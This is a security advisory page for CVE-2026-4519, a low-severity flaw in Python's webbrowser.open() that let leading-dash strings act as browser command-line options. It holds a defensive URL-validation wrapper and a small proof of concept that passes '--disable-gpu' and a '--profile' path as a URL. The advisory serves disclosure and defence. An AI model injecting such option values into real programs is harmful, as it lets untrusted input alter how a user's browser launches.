Security Vulnerability Report
CVE-2026-4519 CVSS 3.3 LOW

CVE-2026-4519

Published: 2026-03-20 15:16:24
Last Modified: 2026-04-16 14:53:23

Description

The webbrowser.open() API would accept leading dashes in the URL which could be handled as command line options for certain web browsers. New behavior rejects leading dashes. Users are recommended to sanitize URLs prior to passing to webbrowser.open().
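As an added defensive example (not part of the advisory or of CPython itself), the following wrapper applies the sanitization the description recommends before calling webbrowser.open(): it rejects any string that starts with a dash and only accepts absolute http(s) URLs with a host. The function names and the scheme allow-list are assumptions.

```python
import webbrowser
from urllib.parse import urlsplit

# Added example, not CPython code: validate a URL before webbrowser.open().
# A string such as "--disable-gpu" must never reach the browser's command
# line, so reject leading dashes and allow only absolute http(s) URLs.
ALLOWED_SCHEMES = {"http", "https"}  # assumption: adjust to your application


def is_safe_browser_url(url: str) -> bool:
    """Return True only for URLs that are safe to hand to webbrowser.open()."""
    if not isinstance(url, str):
        return False
    candidate = url.strip()
    # Leading dashes could be parsed as command line options by the browser.
    if candidate.startswith("-"):
        return False
    parts = urlsplit(candidate)
    # Require an explicit, allow-listed scheme and a non-empty host part.
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False
    if not parts.netloc:
        return False
    return True


def safe_open(url: str) -> bool:
    """Open the URL only after validation; raise ValueError otherwise."""
    if not is_safe_browser_url(url):
        raise ValueError(f"refusing to open untrusted URL: {url!r}")
    return webbrowser.open(url.strip())
```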

CVSS Details

CVSS Score
3.3
Severity
LOW
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:python:python:*:*:*:*:*:*:*:* (versions before 3.13.13) - VULNERABLE
cpe:2.3:a:python:python:*:*:*:*:*:*:*:* (versions from 3.14.0 before 3.14.4) - VULNERABLE
cpe:2.3:a:python:python:3.15.0:alpha1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:python:python:3.15.0:alpha2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:python:python:3.15.0:alpha3:*:*:*:*:*:* - VULNERABLE
Python (for the affected versions, refer to the official commit records)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import webbrowser

# PoC: attempt to pass a command line argument to the browser in place of a URL.
# In vulnerable versions, the browser might interpret '--disable-gpu' as a flag.
malicious_url = "--disable-gpu"
# Another example: "--profile=/tmp/malicious_profile"

print(f"Attempting to open: {malicious_url}")
try:
    # Patched versions reject the leading dash instead of launching the browser.
    webbrowser.open(malicious_url)
except Exception as e:
    print(f"An error occurred: {e}")
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4519", "sourceIdentifier": "[email protected]", "published": "2026-03-20T15:16:24.057", "lastModified": "2026-04-16T14:53:22.860", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The webbrowser.open() API would accept leading dashes in the URL which \ncould be handled as command line options for certain web browsers. New \nbehavior rejects leading dashes. Users are recommended to sanitize URLs \nprior to passing to webbrowser.open()."}, {"lang": "es", "value": "La API webbrowser.open() aceptaba guiones iniciales en la URL que podrían ser interpretados como opciones de línea de comandos para ciertos navegadores web. El nuevo comportamiento rechaza los guiones iniciales. Se recomienda a los usuarios sanear las URL antes de pasarlas a webbrowser.open()."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", 
"modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.13.13", "matchCriteriaId": "74460139-CF2A-457B-82B4-7B655FB576B1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.14.0", "versionEndExcluding": "3.14.4", "matchCriteriaId": "AA3B34C3-1E02-4674-8370-0DD4D24DBE58"}, {"vulnerable": true, "criteria": "cpe:2.3:a:python:python:3.15.0:alpha1:*:*:*:*:*:*", "matchCriteriaId": "A3327507-0B1D-4F28-A983-D07A2C8A7696"}, {"vulnerable": true, "criteria": "cpe:2.3:a:python:python:3.15.0:alpha2:*:*:*:*:*:*", "matchCriteriaId": "C8AF17F1-A27F-4C98-BA5A-B4319710E8D1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:python:python:3.15.0:alpha3:*:*:*:*:*:*", "matchCriteriaId": "24CF56B0-2F4E-42A2-B655-F493AA0A4815"}, {"vulnerable": true, "criteria": "cpe:2.3:a:python:python:3.15.0:alpha4:*:*:*:*:*:*", 
"matchCriteriaId": "7184ABBA-B100-489E-B5C1-1C9EEC0546CA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:python:python:3.15.0:alpha5:*:*:*:*:*:*", "matchCriteriaId": "B6D4181B-3E1B-499B-AAB1-50868A6A6AD3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:python:python:3.15.0:alpha6:*:*:*:*:*:*", "matchCriteriaId": "A52F6DD2-717D-4E8C-8DB7-00890BC1ABAE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:python:python:3.15.0:alpha7:*:*:*:*:*:*", "matchCriteriaId": "8C46C55C-801E-4F86-B669-8E6A12B4AB6F"}]}]}], "references": [{"url": "https://github.com/python/cpython/commit/3681d47a440865aead912a054d4599087b4270dd", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/python/cpython/commit/43fe06b96f6a6cf5cfd5bdab20b8649374956866", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/python/cpython/commit/591ed890270c5697b013bf637029fb3e6cd2d73e", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/python/cpython/commit/594b5a05dc9913880ac92eded440defbf32a28d1 ... (truncated)